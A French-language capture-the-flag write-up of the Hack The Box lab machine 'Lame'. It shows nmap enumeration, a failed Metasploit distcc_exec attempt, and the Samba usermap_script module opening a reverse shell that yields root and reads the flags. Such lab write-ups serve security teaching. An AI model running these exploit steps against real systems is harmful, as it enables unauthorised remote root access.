LAME Solution Détaillée

À mon avis, il s’agit réellement de la machine la plus simple sur toute la plateforme HTB. On trouve une vulnérabilité qui nous donne un accès administrateur, et à partir de là on lit facilement tous les flags.

Énumération Link to heading

Commençons avec un scan nmap :

nmap -Pn -A 10.10.10.3
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-26 20:46 CEST
Nmap scan report for 10.10.10.3
Host is up (0.079s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION

21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.221
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status

22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 2h00m26s, deviation: 2h49m45s, median: 24s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2025-05-26T14:47:35-04:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.70 seconds

L’on apprend que le service FTP permet l’authentification anonyme ce qui est très peu sûr, par contre aucun fichier n’est trouvé sur le disque partagé. On voit aussi que cette version de FTP est vulnérable à une porte dérobée qui permet l’exécution de code.

Le service SSH ne semble pas particulièrement vulnérable.

Le serveur SMB paraît vulnérable. Mais avant de s’y attarder, vérifions que nous n’avons pas raté de ports ouverts :

nmap -p- -Pn 10.10.10.3
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

Il y a un port non-conventionnel qui est ouvert. Penchons-nous sur son cas :

nmap -Pn -A -p 3632 10.10.10.3
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-26 20:59 CEST
Nmap scan report for 10.10.10.3
Host is up (0.079s latency).

PORT     STATE SERVICE VERSION
3632/tcp open  distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Le service distccd est apparemment un compilateur de code C, la version paraît vulnérable.

Vulnérabilité Link to heading

distccd Link to heading

D’abord, étudions le port non-conventionnel puisque c’est souvent là que sont les solutions.

Nous trouvons une vulnérabilité pour ce service et cette version, et metasploit en a un module spécifique :

msfconsole -q
msf6 > search distccd

Matching Modules
================

   #  Name                            Disclosure Date  Rank       Check  Description
   -  ----                            ---------------  ----       -----  -----------
   0  exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution

Sélectionnons ce module et lançons-le :

use 0
set rhosts 10.10.10.3
set lhost tun0
check
[+] 10.10.10.3:3632 - The target is vulnerable.

Le module nous indique que la cible est bien vulnérable :

run
[*] Started reverse TCP handler on 10.10.14.221:4444
[*] 10.10.10.3:3632 - stderr: bash: 106: Bad file descriptor
[*] Exploit completed, but no session was created.

Nous obtenons une erreur de création de session plusieurs fois de suite. Avant de persister, étudions la vulnérabilité SMB.

SMB Link to heading

Voyons si nous avons plus de chance avec cette vulnérabilité SMB. D’après notre scan nmap, la cible est une machine linux qui fait tourner le logiciel Samba version 3.0.20-Debian. Le module usermap_script semble prometteur.

msfconsole -q
search usermap_script
use 0
set rhosts 10.10.10.3
set lhost tun0
exploit
<SNIP>
whoami
root

Post-Exploitation Link to heading

L’exploitation du module nous donne directement un accès administrateur à la machine, pas besoin d’escalader les privilèges. Lisons simplement les drapeaux et terminons cette machine !

cat /root/root.txt
cat /home/makis/user.txt

Fin.